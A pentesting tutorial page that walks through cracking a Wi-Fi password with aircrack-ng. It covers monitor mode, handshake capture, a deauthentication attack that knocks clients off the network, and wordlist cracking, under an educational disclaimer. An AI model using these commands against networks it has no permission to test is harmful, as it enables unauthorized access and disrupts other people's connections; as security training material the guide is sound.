LogoLogo
  • Hack By Steps
  • PENTESTING
    • WiFi
    • RFID / NFC
    • Web
    • Network
  • OSINT
    • SOCMINT
  • COLLABORATE
    • Submit your Step By Step
    • Sponsor the Project
  • LINKS
    • GitHub Repository
    • Discord Community
Powered by GitBook

Hack By Steps

  • GitHub Repository
  • Discord Community

bst04

  • GitHub Profile
  • Ko-fi Donations

CyberSources

  • Website Hub
  • Discord Community

@ Made by bst04

On this page
  • 📌 Basic Information
  • 📋 Requirements
  • 🚀 Step-by-Step Process
  • 🛠 Tips and Best Practices
  • Conclusion
  1. PENTESTING
  2. WiFi

How to Crack a Wifi

Last updated 3 months ago

This tutorial demonstrates how to crack a Wi-Fi network using a wireless adapter in monitor mode and the aircrack-ng suite. Created by @bst04.

Disclaimer: This guide is intended for educational purposes only. Unauthorized access to any network is illegal and unethical. Use this knowledge responsibly and ethically.


📌 Basic Information

1. Network Protocols

Understanding the protocols used in Wi-Fi networks is essential:

  • WEP (Wired Equivalent Privacy): An obsolete protocol with significant security flaws.

  • WPA (Wi-Fi Protected Access): Improved security over WEP but still vulnerable to weak passwords.

  • WPA2: More secure than WPA, using AES/PSK encryption. Still susceptible to brute-force attacks if weak passwords are used.

  • WPA3: The latest standard with enhanced protection against brute-force attacks. However, not all networks have adopted it yet.

2. Encryption and Authentication Methods

  • TKIP (Temporal Key Integrity Protocol): Legacy encryption with dynamic keys per packet; vulnerable to brute-force attacks.

  • AES (Advanced Encryption Standard): A secure symmetric encryption method widely used in modern Wi-Fi networks.

  • PSK (Pre-Shared Key): Commonly used for home networks, where a shared key is used for authentication. Vulnerable to brute-force attacks if the password is weak.


📋 Requirements

Before proceeding, ensure you have the following:

  1. Aircrack-ng Suite: Installed on your system.

  2. Wireless Adapter Compatible with Monitor Mode: Ensure your adapter supports packet injection and monitor mode.


🚀 Step-by-Step Process

Step 1: Install Aircrack-ng

If you're not using Kali Linux, you'll need to install the aircrack-ng suite. Run the following command in your terminal:

sudo apt-get update
sudo apt-get install aircrack-ng

Note: If you're using Kali Linux, aircrack-ng is pre-installed.


Step 2: Enable Monitor Mode

To capture packets from the target network, your wireless adapter must be in monitor mode. First, identify your wireless interface by running:

ip addr

Once you know the interface name (e.g., wlan0), enable monitor mode:

sudo airmon-ng start [interface]

Example: If your interface is wlan0, run:

sudo airmon-ng start wlan0

This will create a new interface, typically named wlan0mon.


Step 3: Scan for Wi-Fi Networks

Use airodump-ng to scan for nearby Wi-Fi networks:

sudo airodump-ng [interface + mon]

Example: If your monitor mode interface is wlan0mon, run:

sudo airodump-ng wlan0mon

This will display a list of available networks, including their BSSID (MAC address), channel, and encryption type. Note down the details of the target network.


Step 4: Capture the Handshake

Focus on the target network by capturing its handshake. Use the following command:

sudo airodump-ng -c [channel] --bssid [BSSID] -w [output file] [interface + mon]

Example: If the target network is on channel 6 with BSSID 00:11:22:33:44:55, run:

sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

Leave this process running until the handshake is captured. You can verify the capture by checking the output file (capture-01.cap).

To speed up the handshake capture, deauthenticate connected clients using aireplay-ng:

sudo aireplay-ng -0 5 -a [BSSID] -c [STATION] [interface + mon]

Example: If the station (connected device) is 66:77:88:99:AA:BB, run:

sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon

Step 5: Crack the Password

Once you have the handshake file, use aircrack-ng to attempt cracking the password. Provide a wordlist for brute-forcing:

sudo aircrack-ng -w [wordlist file] [handshake file]

Example: If your wordlist is rockyou.txt and the handshake file is capture-01.cap, run:

sudo aircrack-ng -w rockyou.txt capture-01.cap

The tool will try each password in the wordlist until it finds a match or exhausts the list.


🛠 Tips and Best Practices

  1. Use a Strong Wordlist: Tools like hashcat or online resources provide comprehensive wordlists.

  2. Optimize Your Wireless Adapter: Ensure your adapter is compatible with packet injection and has good signal reception.

  3. Be Patient: Cracking strong passwords may take time, depending on the complexity and length of the passphrase.


Conclusion

By following these steps, you can learn how to crack a Wi-Fi network using aircrack-ng. Remember to use this knowledge responsibly and within legal boundaries. Happy learning!